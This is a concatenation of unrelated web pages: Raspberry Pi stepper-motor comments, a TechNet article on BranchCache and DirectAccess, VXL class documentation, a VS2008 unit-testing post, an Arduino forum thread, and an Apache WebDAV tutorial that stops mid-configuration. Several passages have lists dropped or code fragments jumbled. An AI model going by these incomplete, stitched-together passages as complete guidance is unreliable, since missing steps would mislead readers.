to fix. Also, the full step logic should have two phases on at all times (i.e. the steps with two outputs set to one). Move the two-phase arrays to even slots to fix it.

Hi Will, I've updated the sequence so it starts with two phases energised. I've also corrected a bug that got the sequencing wrong for negative steps. Should work much better now.

Hi, the cycle skips one step in the sequence. I think the = sign in line 63 is superfluous.

You're right. The sequencing was incorrect. I've made a few changes and it should correctly handle StepDir settings of -2, -1, 1 and 2. I've updated the print statements to make the sequence more obvious.
The while loop keeps the motor stepping through the sequence. by using your code, yes the motor keep running forever. I’m a newbie in writing a code, so i don’t know how to ”stop” the motor as i reached the desire seq step that i want. You would need to get rid of the “while: true” loop and replace with something that just repeated a set number of times. Perhaps a “for” loop? In the listing above there’s an error in line 53. The if statement should start on a new line. Somebody on the RPF forum just ran into that problem: The script on bitbucket seems to b OK though. Thanks Dirk. I’ve fixed it on the page. There is a strange issue with the syntax highlighter where it refuses to put a line break between those two lines. The page still lists the if statement on the same line as xpin on this page. There is a bug in the code formatter. I had to add a stray # character to keep the “if” on the correct line! Hi Matt, You Mention the pins you are wiring up: Inp1 (P1-18) Inp2 (P1-22) Inp3 (P1-24) Inp4 (P1-26) and then use a different set in the code: # Define GPIO signals to use # Physical pins 11,15,16,18 # GPIO17,GPIO22,GPIO23,GPIO24 StepPins = [17,22,23,24] Well spotted I’ve updated the text so the pins are consistent. That is awesome! I have been looking everywhere for help on this and most things tried to push you to arduino boards, I wanted to control one motor and thought that was overdoing it. Now I get to hack this code, we are using it to control a computer science team’s vending machine. Hello, used your code and it say this: xpin = StepPins[pin]if Seq[StepCounter][pin]!=0: ^ SyntaxError: invalid syntax How can i fix it? Thank you You need to put a line break before the “if”. The code formatter on this site got confused and deleted the line break. The easiest solution is to download the file direct from my Bitbucket repository rather than cut-n-paste from the web page. 
"# Physical pins 11,15,16,18
# GPIO17,GPIO22,GPIO23,GPIO24
StepPins = [17,22,23,24]"

Thank you for this guide! Can you please explain the difference between physical pins and GPIO/StepPins? I can't figure out why there is a distinction between them. So Physical Pin 11 is StepPin 17? Physical Pin 15 is StepPin 22? How is this correlation established? Why aren't physical pin and GPIO/StepPin numbers the same?

The physical pins number the pins from 1 to 40 on the header in sequence. The GPIO numbers refer to signal names coming from the Pi's CPU. Obviously there is some room for confusion here. You can find a diagram of the Raspberry Pi header that shows both physical pin numbers and GPIO references on the Simple Guide to the Raspberry Pi GPIO Header.
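Several of the comments above ask how to rotate the motor a set amount and then stop. One approach is to replace the while True loop with a for loop over a computed step count. The sketch below assumes the commonly quoted figure of 4096 half-steps per output revolution for this motor (roughly 64 half-steps per motor turn through a roughly 64:1 gearbox; the true gear ratio is slightly under 64:1, so treat the number as approximate):

```python
# Illustrative sketch: convert a target angle into a half-step count.
# 4096 is the commonly quoted half-steps per output revolution for this
# geared motor; long moves will drift slightly because the real gear
# ratio is not exactly 64:1.

STEPS_PER_REV = 4096

def steps_for_angle(degrees, steps_per_rev=STEPS_PER_REV):
    """Number of half-steps to turn the output shaft by `degrees`."""
    return round(steps_per_rev * degrees / 360.0)

print(steps_for_angle(360))  # 4096
print(steps_for_angle(90))   # 1024
```

In the script above, the main loop would then become for step in range(steps_for_angle(90)): instead of while True:, with the same loop body.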
https://www.raspberrypi-spy.co.uk/2012/07/stepper-motor-control-in-python
While the unwashed masses finally have their first peek at Windows Server 2008 R2 and Windows 7, the chosen ones have been working with the release candidate (RC) code since May and the release to manufacturing (RTM) version since August. Whichever group you're in, you have probably been inundated with hype. Maybe you were invited to a Windows 7 preview "house party," like me, for example. (My son-in-law hosted one, but only because he wanted the software free from Microsoft.) Even if you were spared that major hype, you couldn't have avoided the many media reports extolling or questioning the new features of these products, both of which come from a new code tree and constitute new operating systems.

BranchCache and DirectAccess, arguably the crown jewels of these releases, are worth your attention. With BranchCache, Microsoft aims to give branch employees the same experience working with files as their peers at the corporate office. With DirectAccess, Microsoft targets remote users connecting to corporate networks via virtual private networks (VPNs). As is typical with Microsoft, you only get the good stuff on the new products. In this case, you can only implement BranchCache and DirectAccess with Windows 7 clients and Windows Server 2008 R2 servers. Let's take a deeper look at each of these new features.

BranchCache improves the branch office experience by caching commonly used files locally, either on a Windows Server 2008 R2 server or on user workstations, rather than forcing users to access files via centrally located network shares. BranchCache is cool, but there are caveats. IT can deploy BranchCache in Distributed Cache Mode or Hosted Cache Mode (see Figure 1). IT configures the mode via Group Policy, so using hosted mode at one office and distributed mode at another requires implementing two policies and planning organizational unit (OU) structures accordingly.
Microsoft recommends deploying Distributed Cache Mode in sites of 50 or fewer clients, but it will depend on the speed and bandwidth of the WAN link, as well as other factors. Distributed Cache Mode will require larger hard disks and perhaps more memory and other resources, so at some point it will be more advantageous to use Hosted Cache Mode, especially if there's an existing 2008 R2 server at the site. In addition, Distributed Cache Mode can only work on a local subnet. So if there are multiple subnets at a site, then a client on each subnet will have to cache the file for others on that subnet to download it. However, Hosted Cache Mode can serve multiple subnets at the site, so that would be another reason to choose it.

Figure 1 A branch office can use BranchCache in either distributed or hosted modes.

In Distributed Cache Mode, no file server resides at the branch office. Instead, through policy, all user machines are BranchCache clients; that is, they all have the ability to cache documents that others in the branch site can download, provided it's the current version.

For example, let's say that Caroline requests a document, Reports.docx, from a BranchCache-enabled file server at the central site. BranchCache sends metadata describing the content of the file. Hashes in the metadata are then used to search for the content on the local subnet. If it isn't found, a copy is cached on her computer's local drive.

Later in the day, Tyler needs to modify Reports.docx, so he contacts the share on the main office file server to get a copy to edit. The file server returns the metadata, then the client searches for the content, which it finds on and downloads from Caroline's computer. This is done securely, using an encryption key derived from the hashes in the metadata.

The next day, Abigail needs to modify that same document. The process is the same, but she'll be opening the copy cached on Tyler's computer. Again, the version information is kept at the server.
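To make the flow of hashes and data concrete, here is a deliberately simplified, illustrative model of the lookup just described. It is a sketch of the idea only, not of the real BranchCache wire protocol, and all the names are invented:

```python
# Toy model of hash-based branch caching: the content server hands out
# hashes; the bytes come from whichever peer already cached them, and
# only fall back to the WAN (the server) when no peer has a copy.
import hashlib

def content_id(data):
    return hashlib.sha256(data).hexdigest()

class ContentServer:
    def __init__(self):
        self.files = {}
    def publish(self, name, data):
        self.files[name] = data
    def metadata(self, name):
        # the version check lives here: the hash changes when the file does
        return content_id(self.files[name])

def fetch(name, server, peer_caches):
    h = server.metadata(name)          # cheap: only hashes cross the WAN
    for cache in peer_caches:          # search the branch first
        if h in cache:
            return cache[h], 'peer'
    data = server.files[name]          # fall back to the WAN
    peer_caches[0][h] = data           # requester (first cache) keeps a copy
    return data, 'server'

server = ContentServer()
server.publish('Reports.docx', b'quarterly numbers')
caroline, tyler = {}, {}

print(fetch('Reports.docx', server, [caroline, tyler])[1])  # 'server'
print(fetch('Reports.docx', server, [tyler, caroline])[1])  # 'peer'
```

The second fetch finds the bytes in Caroline's cache, which is the whole point: after the first WAN transfer, subsequent readers at the branch stay local.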
Clients contact the server to determine if there is a copy of the latest version at their site. This is one of three BranchCache scenarios that will come into play as users work with various documents. The other two are:

In each case, the documents also save to the main office file server. That way, if Caroline comes back and wants to access the document but Abigail's computer, which now houses the latest version, is turned off, she will receive the document from the main office server.

With Hosted Cache Mode, IT configures a Windows Server 2008 R2 file server in the branch office with BranchCache by installing the BranchCache feature and configuring a Group Policy to tell the clients to use Hosted Cache Mode. The procedure described for Distributed Cache Mode works the same here, but the files are cached on a locally configured BranchCache server rather than on the users' computers.

Note: the content metadata maintained by the file server in the central office site is sent to each client when a file is requested from a BranchCache-enabled server. This is used to determine if any local client or server (depending on which cache mode is used) has the most recent copy.

The BranchCache-enabled server at the branch site can be used for other purposes, such as a Web or Windows Server Update Services (WSUS) server. Special considerations must be made in these cases, as described in the Microsoft BranchCache Deployment Guide and Microsoft BranchCache Early Adopter's Guide.

To configure BranchCache, you'll need to understand how Group Policy Objects (GPOs) work and how to configure them in your OU structure to affect the computers at each site. Remember that all servers involved in the BranchCache scenario must be running Windows Server 2008 R2 and all clients Windows 7. Here's the process:

Step 1. Install the BranchCache feature via Server Manager.

Step 2.
If you're using BranchCache on a file server, you'll need to install the File Services role as well as BranchCache for remote files (see Figure 2).

Figure 2 A BranchCache installation requires enabling the File Services and BranchCache for remote files roles.

Step 3. Configure a BranchCache GPO. Go to Computer Configuration | Policies | Administrative Templates | Network | BranchCache. You will see five possible settings:

Figure 3 In the Group Policy Management Console, enable BranchCache for branch office caching.

Step 4. Configure the GPO setting "LanMan Server" in the BranchCache policy. In the same area of the GPO as in Step 3, go to the LanMan Server setting and look at the properties for "Hash Publication for BranchCache." The three options are:

2008 R2 servers running the File Services server role that are meant to be BranchCache content servers must also run the BranchCache for Network Files role service, and hash publication must be enabled on them. BranchCache is also enabled individually on file shares. Hash publication can be enabled individually on a server (such as in a non-domain server configuration) or on groups of servers via Group Policy. Thus, BranchCache can be enabled on all shared folders, on some shared folders, or disabled entirely.

Step 5. Configure the GPO setting in Windows Firewall to allow inbound TCP port 80 (applied to the client computers).

Step 6. Once you've configured everything, and if the file share exists with the users' files, go to Server Manager | File Services | Share and Storage Management. The center pane lists the shares. Right-click on the share and select Properties, then click Advanced. On the Caching tab, enable BranchCache (see Figure 4). Note: if the BranchCache option is unavailable, then the BranchCache feature wasn't installed properly or the policy is set to disabled, as noted previously.

Figure 4 Enable file sharing with BranchCache using Share and Storage Management controls.
By default all Windows 7 clients are enabled for BranchCache, meaning there is nothing to enable on the client itself. However, there are client-related steps that are required: Here's what I like about BranchCache: BranchCache will certainly have its place, but beware these drawbacks: If you can justify putting a file server in the branch office, why not use the Distributed File System (DFS)? Rather than messing around with cached files, you can use DFS Replication (DFS-R) to replicate the files and maintain a namespace with DFS. You may find advantages to caching the network files, and perhaps BranchCache will work on DFS shares. Or perhaps you'll find some performance boundary where the cache is more efficient than DFS-R. On the other hand, the impact on the server for BranchCache would be lower than for a full-blown DFS configuration. The point is, you'll have to study your needs and examine the options available with BranchCache. Of course, each environment is different, and what causes problems in some branch offices won't in others. There is no one right answer for all situations.

With DirectAccess, Microsoft addresses the poor VPN experience users have had since Windows 2000, even with the many improvements made since the initial implementation. A DirectAccess-configured client can access an intranet site from a remote location without having to establish a VPN link manually. In addition, much to their delight, IT staffs can manage remote machines over an Internet connection rather than through the VPN. So if I'm working at home, connected to my company's intranet, and the Internet link drops, DirectAccess re-establishes the connection when the Internet becomes available, without pestering me to reconnect and re-enter my credentials as I would have to do, often repeatedly, with a traditional VPN. In fact, from a user's viewpoint, DirectAccess is invisible.
When a user on an enabled client clicks on the intranet link, DirectAccess handles the connection and disconnection. Users do not have to open Connection Manager, enter their credentials, wait for the connection and so on. While the remote connection is live, the user has a “split tunnel” configuration by default (see Figure 5). This enables simultaneous access to the intranet, the local network (for use of devices such as printers) and the Internet. In a typical VPN scenario without the split tunnel, connecting to the Internet means first hopping on the intranet and then passing through the corporate network gateway for connectivity. In addition, I have no access to my local network, although workarounds are possible. So again, DirectAccess is designed to give the remote user a more “in the office” experience than traditional VPN affords. Figure 5 DirectAccess enables a split-tunnel configuration for simultaneous connectivity to the corporate network and Internet. From IT’s perspective, once the computer is on the Internet (remember that DirectAccess is always enabled if it’s installed), patches, policies and other updates are easy—and secure via IPsec connections—to apply. In a basic DirectAccess configuration, the DirectAccess server is on the edge network, providing remote user connectivity to internal resources including the application servers, certificate authorities (CAs), the DNS and domain controllers (DCs). CAs and application servers must be configured to accept IPv6 traffic. Here are the essential components of a DirectAccess configuration: As you can see, DirectAccess is not for the faint of heart. The IPv6 requirement alone will undoubtedly raise concern—and require most organizations to implement transition technologies—but 2008 R2 does have the components. In addition, you have to enable security via a public key infrastructure (PKI), provide authentication services and set up IPv6 identification to application servers. 
Before running the DirectAccess setup wizard, you also have to configure the security groups, establish firewall policies, set up DNS and complete a number of other prerequisites. The DirectAccess server performs a number of functions, defined through Server Manager's DirectAccess setup wizard (see Figure 6).

Figure 6 Initiate DirectAccess setup through Server Manager.

The DirectAccess wizard performs four essential tasks. Through the wizard you will: As noted previously, DirectAccess clients can access the intranet directly. To enable this, you must implement the NRPT, which defines DNS servers per DNS namespace rather than per network interface. I think of this as similar to the way conditional forwarding works on Windows 2003 and 2008 DNS servers, where you can define DNS namespaces with the appropriate IP address to connect to the server. The NRPT allows a client to skip normal DNS resolution and go directly to the DirectAccess server. Here's how the NRPT works (see Figure 7):

Figure 7 The NRPT enables definition of DNS servers per DNS namespace rather than per interface.

The NRPT is configured during DirectAccess setup on the Infrastructure Server Setup page, and the wizard fills in the IPv6 address of the DNS server. Name Resolution Policy, a new Group Policy setting for 2008 R2, defines specific policy settings such as IPsec, the DNS server and how name resolution falls back when a namespace isn't matched. You'll find this in Computer Configuration | Windows Settings | Name Resolution Policy (note, you must enter domain namespaces with a leading dot "."—for example, .emea.corp.net). You can expose the NRPT contents using the Netsh command: netsh namespace show policy. This will show the namespaces defined. Firewall exclusions will depend on how you implement the IPv6 network and whether you use the transition technologies. In addition, any file or application servers the remote clients must connect to will need Windows Firewall configured appropriately.
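The longest-matching-suffix behavior of the NRPT described above can be sketched as a simple lookup table. This is a simplified illustration of the idea, not Windows' actual matching rules; the table contents and server addresses below are made up.

```python
def pick_dns_server(nrpt, name, interface_dns):
    """Return the DNS server to query for `name` under an NRPT-style policy."""
    # nrpt maps namespace suffixes (entered with a leading dot) to DNS servers.
    matches = [suffix for suffix in nrpt if name.endswith(suffix)]
    if not matches:
        return interface_dns            # no rule matched: normal interface DNS
    return nrpt[max(matches, key=len)]  # the most specific namespace wins
```

With rules for both .corp.net and .emea.corp.net, a query for app.emea.corp.net matches both, and the longer (more specific) namespace decides which DNS server is used; names outside every namespace fall back to ordinary resolution.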
Figure 8 and Figure 9, below, show firewall exclusions for the firewall on the Internet and intranet sides of the DirectAccess server, respectively. Obviously you only need to set exclusions for technologies you are using. (Note that even though Figure 9 lists IPv4+NAT-PT, it's not implemented by Windows 2008 R2.)

Figure 8 Firewall Settings for the Internet Firewall

Figure 9 Firewall Settings for the Intranet Firewall

Because DirectAccess relies on IPv6 to give clients continuous connectivity to resources on the corporate network, all participants must run the protocol. Even if you have a fully implemented IPv6 network internally, remote connectivity may require a transition technology that lets the DirectAccess client carry IPv6 traffic across the IPv4 Internet by encapsulating IPv6 inside IPv4 packets. These technologies include 6to4, IP-HTTPS and Teredo. ISATAP is also an encapsulation technology, but it is only used internally. I won't go into detailed descriptions here, but Figure 10 shows basic connectivity options.

Figure 10 Preferred Connection Options for DirectAccess Clients Source: Microsoft

On the intranet side, without native IPv6, DirectAccess permits use of ISATAP, which generates an IPv6 address from an IPv4 address and implements its own neighbor discovery. ISATAP allows DirectAccess clients to access resources on an IPv4 network. When an ISATAP client boots, it must find an ISATAP router. It does this by issuing a DNS query for ISATAP.<domain name>; for Corp.net it would look for ISATAP.corp.net. You can also implement 6to4 individually on hosts or over an entire network and transmit IPv6 packets over an IPv4 network. Interestingly, if 6to4 is implemented for an entire network, it requires only one public IPv4 address. It does not, however, support traffic between IPv4-only and IPv6-only hosts.
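As an aside, the 6to4 mapping just mentioned is purely mechanical: the site's single IPv4 address is embedded directly in a prefix under 2002::/16 (per RFC 3056). A quick sketch:

```python
def sixto4_prefix(ipv4: str) -> str:
    """Derive the 6to4 /48 prefix embedded in 2002::/16 for an IPv4 address."""
    octets = [int(part) for part in ipv4.split(".")]
    # 2002:VVVV:WWWW::/48, where VVVVWWWW is the IPv4 address written in hex
    return "2002:{:02x}{:02x}:{:02x}{:02x}::/48".format(*octets)

print(sixto4_prefix("192.0.2.1"))  # 2002:c000:0201::/48
```

This is why a whole 6to4 site needs only one public IPv4 address: the /48 derived from it leaves 80 bits for subnets and hosts behind the 6to4 router.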
Teredo also allows IPv6 packets to be carried over IPv4 networks, but it is used when the client is behind a Network Address Translation (NAT) device that is not configured for IPv6. It encapsulates IPv6 packets in IPv4 datagrams that the NAT can forward. Windows 7 and Server 2008 R2 implement a protocol called IP-HTTPS that tunnels IPv6 packets inside an IPv4-based HTTPS session. While IP-HTTPS has poorer performance than the other protocols, you can add additional IP-HTTPS servers to improve performance somewhat, and it is a fairly easy protocol to enable in order to get IPv6-over-IPv4 connectivity working.

When designing the DirectAccess client configuration, you can either use DNS and the NRPT to separate Internet and intranet traffic, or you can use Force Tunneling to force all traffic through the tunnel. Force Tunneling, which requires IP-HTTPS, is enabled via the Group Policy setting Computer Configuration\Policies\Administrative Templates\Network\Network Connections\Route all traffic through the internal network. This policy needs to apply to the DirectAccess clients. I noted previously that DirectAccess clients can access local resources while connected to the intranet. This still holds true for IP-HTTPS clients, but if the user tries to access Internet sites, for example, the traffic would be routed through the intranet.

Certainly the IPv6 requirement and complex configuration are downsides to DirectAccess, but those are easily outweighed by the user experience improvements and the ease of remote client management for IT. The number of remote workers, be they at a branch, in a home office or on the road, is increasing. BranchCache and DirectAccess hold great promise for branch office and other remote workers, and IT managers and administrators would be wise to investigate them. Neither will be a quick and easy setup, and both offer a number of options and features.
In addition, these features will only work on Windows 7 clients and Windows Server 2008 R2 servers, so this will definitely impact an implementation timeline. IT managers and administrators would be wise to study the Microsoft documentation available and configure it in a test lab to ensure success. Gary Olsen is a systems software engineer in HP's Worldwide Technical Expert Center (Hewlett-Packard WTEC) in Atlanta, Ga., and has worked in the IT industry since 1981. In addition to being a Microsoft MVP for Directory Services, he's founder/chairman of the Atlanta Active Directory Users Group and is a frequent contributor to Redmond magazine.
http://technet.microsoft.com/en-us/ee835709.aspx
Represents a homogeneous 3D line using two points. More... #include <vgl_homg_line_3d_2_points.h> Represents a homogeneous 3D line using two points. A class to hold a homogeneous representation of a 3D Line. The line is stored as a pair of homogeneous 3d points. Definition at line 25 of file vgl_homg_line_3d_2_points.h. Default constructor with (0,0,0,1) and (1,0,0,0), which is the line y=z=0. Definition at line 40 of file vgl_homg_line_3d_2_points.h. Copy constructor. Definition at line 44 of file vgl_homg_line_3d_2_points.h. Construct from two points. Definition at line 48 of file vgl_homg_line_3d_2_points.h. force the point point_infinite_ to infinity, without changing the line. This is called by the constructors Definition at line 40 of file vgl_homg_line_3d_2_points.txx. Return true iff line is at infinity. Definition at line 75 of file vgl_homg_line_3d_2_points.h. Definition at line 59 of file vgl_homg_line_3d_2_points.h. comparison. Definition at line 21 of file vgl_homg_line_3d_2_points.txx. Finite point (Could be an ideal point, if the whole line is at infinity.). Definition at line 64 of file vgl_homg_line_3d_2_points.h. Infinite point: the intersection of the line with the plane at infinity. Definition at line 66 of file vgl_homg_line_3d_2_points.h. Assignment. Definition at line 69 of file vgl_homg_line_3d_2_points.h. Are two lines concurrent, i.e., do they intersect?. Definition at line 107 of file vgl_homg_line_3d_2_points.h. Are three lines concurrent, i.e., do they pass through a common point?. Definition at line 136 of file vgl_homg_line_3d_2_points.h. Are two lines coplanar, i.e., do they intersect?. Definition at line 101 of file vgl_homg_line_3d_2_points.h. Are three lines coplanar, i.e., are they in a common plane?. Definition at line 119 of file vgl_homg_line_3d_2_points.h. Return the intersection point of two concurrent lines. Return true iff line is at infinity. Definition at line 88 of file vgl_homg_line_3d_2_points.h. 
Write to stream (verbose). Read parameters from stream. Return the two points of nearest approach of two 3D lines, one on each line. There are 3 cases: the lines intersect (hence these two points are equal); the lines are parallel (an infinite number of solutions viz all points); the lines are neither parallel nor do they intersect (the general case). This method handles all 3 cases. In all cases, a pair of points is returned; in case 1, the two returned points are equal; in case 2, both points are the common point at infinity of the two lines. Note that case 2 also comprises the case where the given lines are identical. Hence, when observing a point at infinity as a return value, one should interpret this as "all points are closest points". This routine is adapted from code written by Paul Bourke and available online at Return the perpendicular distance between two lines in 3D. See vgl_closest_point.h for more information. Return the perpendicular distance from a point to a line in 3D. See vgl_closest_point.h for more information. find the shortest distance of the line to the origin. Any finite point on the line. Definition at line 30 of file vgl_homg_line_3d_2_points.h. the (unique) point at infinity. Definition at line 32 of file vgl_homg_line_3d_2_points.h.
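The three-case closest-points computation described above can be sketched outside of VXL as well. Below is a minimal Python version of the standard two-parameter approach (in the spirit of the Bourke routine mentioned, not VXL's actual code): solve for the parameters that make the connecting segment perpendicular to both lines, treating a near-zero denominator as the parallel case.

```python
def closest_points(p1, d1, p2, d2, eps=1e-12):
    """Closest points between 3D lines p1 + t*d1 and p2 + s*d2.

    Returns a pair of points, or None for (near-)parallel lines,
    mirroring the "all points are closest points" case described above.
    """
    dot = lambda a, b: sum(x * y for x, y in zip(a, b))
    w0 = tuple(x - y for x, y in zip(p1, p2))
    a, b, c = dot(d1, d1), dot(d1, d2), dot(d2, d2)
    d, e = dot(d1, w0), dot(d2, w0)
    denom = a * c - b * b        # zero iff the directions are parallel
    if abs(denom) < eps:
        return None
    t = (b * e - c * d) / denom
    s = (a * e - b * d) / denom
    on_first = tuple(p + t * v for p, v in zip(p1, d1))
    on_second = tuple(p + s * v for p, v in zip(p2, d2))
    return on_first, on_second
```

For intersecting lines the two returned points coincide at the intersection; for skew lines, the distance between them is the perpendicular distance between the lines.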
http://public.kitware.com/vxl/doc/release/core/vgl/html/classvgl__homg__line__3d__2__points.html
Hi Everybody,

As you know, VS.NET 2008 comes with unit testing built in. To start with a test-driven approach, we need to understand how unit testing works in VS.NET 2008. Many of us might already be using available tools/frameworks for this, NUnit being the most popular. All those who want to shift to VS.NET 2008 unit testing won't be unhappy: a similar approach is followed there. You have to use attributes to mark up test classes and methods, and you can use the Assert class for checking conditions. Some of the features are described below.

Many of the features provided in NUnit are, at present, missing from this implementation. For example, you cannot test message boxes, or UI elements in general, from within VS.NET 2008, so we need to wait until that is included in future releases. The targeted audience for this post is beginners who want to get a feel for test-driven development.

1. You can create unit test cases by writing code from scratch or by using the unit test wizard. The wizard asks you which project unit test cases should be generated for.
2. Attributes, as in NUnit, are used to denote test methods and test classes.
3. UI testing is not supported in the current version of unit testing with VS.NET 2008.
4. You cannot run NUnit test cases from within VS.NET 2008; you will need the separate NUnit framework executable to do that.

Steps required for writing unit test cases in VS.NET 2008:

1. Create a new class representing a unit test case. The attribute used is TestClass. For example:

[TestClass()]
public class Window1Test

You can do this by either writing the code yourself or generating it through the wizard.

2. Create new test methods. The attribute used is TestMethod. For example:

[TestMethod()]
public void Window1ConstructorTest()

If you have generated test cases through the wizard, most of the test methods are generated for you automatically. If you want, you can always add custom test methods as shown above.

3.
To check some condition, the Assert class is available, with all kinds of static methods. If the condition fails, an exception is thrown with an error message provided by you. For example:

Assert.IsFalse(blnSample, "The boolean value should not be true.");

The meaning of this statement is: if the blnSample boolean value is true, an exception is thrown with "The boolean value should not be true." as the exception message.

Other attributes that can be used are:

1. Use ClassInitialize to run code before running the first test in the class:

[ClassInitialize()]
public static void MyClassInitialize(TestContext testContext) { }

2. Use ClassCleanup to run code after all tests in a class have run:

[ClassCleanup()]
public static void MyClassCleanup() { }

3. Use TestInitialize to run code before running each test:

[TestInitialize()]
public void MyTestInitialize() { }

4. Use TestCleanup to run code after each test has run:

[TestCleanup()]
public void MyTestCleanup() { }

How do you run the unit test cases you have written? There is a separate menu provided for unit testing, named Test. Under this menu a Run submenu is available, with which you can run tests in the current context or all tests in the current solution. Please see the screenshot for a clear understanding.

Where do you see test execution results? Like the error list, task list, immediate window or breakpoints window, the Test Results window appears at the bottom of the VS.NET 2008 screen. See the screenshot below.
http://www.codeproject.com/KB/tips/unittestingvsnet2008.aspx
For most cases this will result in no pointer change at all and a simple adjustment of the allocated length - usually out into free space in most use-cases on a small system like this.

So is there anything in the external programming that can be done to free the no longer used allocated memory space? Perhaps enable the WDT, let it time out, and have the sketch start all over?

Andy Brown, I think you will find that Nick knows more about the code than you credit. And he isn't given to making unfounded claims.

#define free myfree

But the bug in question is something to do with the first (or last?) allocated block not being freed correctly, or something like that.

global variables work better for me and I haven't heard of a good reason I should avoid them in my Arduino sketches. Lefty

//A global
int i = 666;

template <typename T>
struct Base {
  Base( int i_NewVal ) : i( i_NewVal ) {return;}
  int i;
};

template <typename T>
struct Squared : public Base<T> {
  Squared( int i_NewVal ) : Base<T>( i_NewVal * i_NewVal ) {return;}
  T Result() { return i; }
};

void setup() {
  Squared< long > s_Square( 2 );
  Serial.begin( 9600 );
  Serial.print( "2 squared = " );
  Serial.print( s_Square.Result() );
  return;
}

void loop(){return;}

int i = 666; //A global

int i = 666;

void setup() {
  int i = 2 * 2;
  Serial.begin( 9600 );
  Serial.print( "2 squared = " );
  Serial.print( i );
  return;
}

void loop(){return;}

As a minimum, place the global in a namespace so it has to be explicitly used. Your sketch is not about globals; rather it warns of the perils one faces by using poorly named variables

template <typename T>
struct Squared : public Base<T> {
  Squared( int i_NewVal ) : Base<T>( i_NewVal * i_NewVal ) { return; }
  T Result() { return Base<T>::i; }
};
http://forum.arduino.cc/index.php?topic=124367.30
How To Configure WebDAV Access with Apache on Ubuntu 14.04

Introduction

WebDAV is an extension of the HTTP protocol that allows users to manage files on servers. There are many ways to use a WebDAV server. For example, you can share Word or Excel documents with your colleagues by uploading them to your WebDAV server. You can even share your music collection with your family and friends by simply giving them a URL. All this can be achieved without them installing anything.

There are many ways to manage files on a remote server. WebDAV has several benefits over other solutions such as FTP or Samba. In this article, we will go through how to configure your Apache server to allow native WebDAV access from Windows, Mac, and Linux with authentication.

Why WebDAV?

WebDAV offers several advantages:

- Native integration on all major operating systems (Windows, Mac, Linux); there is no need to install third-party software to use WebDAV.
- Support for partial transfers.
- More choices for authentication. Being on HTTP means NTLM, Kerberos, LDAP, etc. are all possible.

Depending on your situation, WebDAV may be the best solution for your needs.

Why Apache?

There are many web servers around that support WebDAV on Linux. However, Apache has the most compliant implementation of the WebDAV protocol out there. At the time of writing, WebDAV on Nginx and Lighttpd works, but only partially.

Prerequisites

You'll need an Ubuntu 14.04 server. Before we start, let us first create a user with sudo access. You can run commands as root, but it is not encouraged due to security concerns. There is an excellent article on adding users on Ubuntu 14.04 should you wish to learn more.

Creating a User

When you first create a DigitalOcean instance, you will be given credentials that allow you to log in as root. As root, let us first add a user called alex.

adduser alex

You will be prompted to create a password for the user alex as shown below.
There will be further prompts for information about the user alex. You may enter them if you wish.

Adding user `alex' ...
Adding new group `alex' (1000) ...
Adding new user `alex' (1000) with group `alex' ...
Creating home directory `/home/alex' ...
Copying files from `/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for alex
Enter the new value, or press ENTER for the default
        Full Name []:
        Room Number []:
        Work Phone []:
        Home Phone []:
        Other []:
Is the information correct? [Y/n] y

Granting sudo Privileges to the User

After creating a new user, the next step is to grant the user alex sudo privileges. Assuming you are still logged in as root, add the user alex to the sudo group by typing in the following command.

usermod -aG sudo alex

Users in the sudo group are granted sudo privileges. Now you can log out and log in as the user alex.

Step One — Installing Apache

Let us get Apache installed.

sudo apt-get update
sudo apt-get install apache2

The Apache web server should be installed and running.

Step Two — Setting Up WebDAV

There are three steps to set up WebDAV. We designate a location, enable the necessary modules, and configure it.

Preparing the Directory

We need to designate a folder for serving WebDAV. We'll create the new directory /var/www/webdav for this. You will also need to change the owner to www-data (your Apache user) in order to allow Apache to write to it.

sudo mkdir /var/www/webdav
sudo chown -R www-data:www-data /var/www/

Enabling Modules

Next we enable the WebDAV modules using a2enmod:

sudo a2enmod dav
sudo a2enmod dav_fs

The Apache modules are found under /etc/apache2/mods-available. This creates a symbolic link from /etc/apache2/mods-available to /etc/apache2/mods-enabled.

Configuration

Open or create the configuration file at /etc/apache2/sites-available/000-default.conf using your favorite text editor.
nano /etc/apache2/sites-available/000-default.conf

On the first line, add the DavLockDB directive configuration:

DavLockDB /var/www/DavLock

And the Alias and Directory directives inside the VirtualHost section:

Alias /webdav /var/www/webdav
<Directory /var/www/webdav>
    DAV On
</Directory>

The file should look like this after editing (abbreviated):

DavLockDB /var/www/DavLock
<VirtualHost *:80>
    Alias /webdav /var/www/webdav
    <Directory /var/www/webdav>
        DAV On
    </Directory>
</VirtualHost>
# vim: syntax=apache ts=4 sw=4 sts=4 sr noet

Then restart Apache:

sudo service apache2 restart

Testing

WebDAV without authentication allows only read access for the users. For testing, let us create a sample file.

echo "this is a sample text file" | sudo tee -a /var/www/webdav/sample.txt

A text file called sample.txt should be created in /var/www/webdav. It should contain the text "this is a sample text file". Now we can try logging in from an external computer. The WebDAV server should be found at http://<your.server.com>/webdav. For the sake of brevity, we are only showing how to log in without credentials on a Mac.

On a Mac, open Finder. On the menu bar, find Go and select the option Connect to Server. Select the Connect as Guest option. Then, click Connect. You should be logged in. If you connect to that shared file system and enter the webdav folder, you should be able to see the file sample.txt that was created earlier. The file should be downloadable.

Step Three — Adding Authentication

A WebDAV server without authentication is not secure. In this section we'll add authentication to your WebDAV server using the Digest authentication scheme.

Basic or Digest Authentication?

There are many authentication schemes available. This table illustrates the compatibility of the various authentication schemes on different operating systems. Note that if you are serving HTTPS, we are assuming your SSL certificate is valid (not self-signed). If you are using HTTP, use Digest authentication, as it will work on all operating systems.
If you are using HTTPS, you have the option of using Basic authentication. We're going to cover the Digest authentication scheme, since it works on all operating systems without the need for an SSL certificate.

Digest Authentication

Let us generate the file (called users.password) that stores the passwords for the users. In Digest authentication there is a realm field, which acts as a namespace for the users. We will use webdav as our realm. Our first user will be called alex. To generate the digest file, we have to install the dependencies.

sudo apt-get install apache2-utils

We are going to add users next. Generate the user password file using the command below.

sudo htdigest -c /etc/apache2/users.password webdav alex

This adds the user alex to the password file. There should be a password prompt to create the password for alex. For subsequent additions of users, you should omit the -c flag. Here's another example adding a user called chris. Create a password when prompted.

sudo htdigest /etc/apache2/users.password webdav chris

We also need to allow Apache to read the password file, so we change the owner.

sudo chown www-data:www-data /etc/apache2/users.password

After the password file is created, we should make changes to the configuration at /etc/apache2/sites-available/000-default.conf. Add the following lines to the Directory directive:

AuthType Digest
AuthName "webdav"
AuthUserFile /etc/apache2/users.password
Require valid-user

The final version should look like this (with the comments removed):

DavLockDB /var/www/DavLock
<VirtualHost *:80>
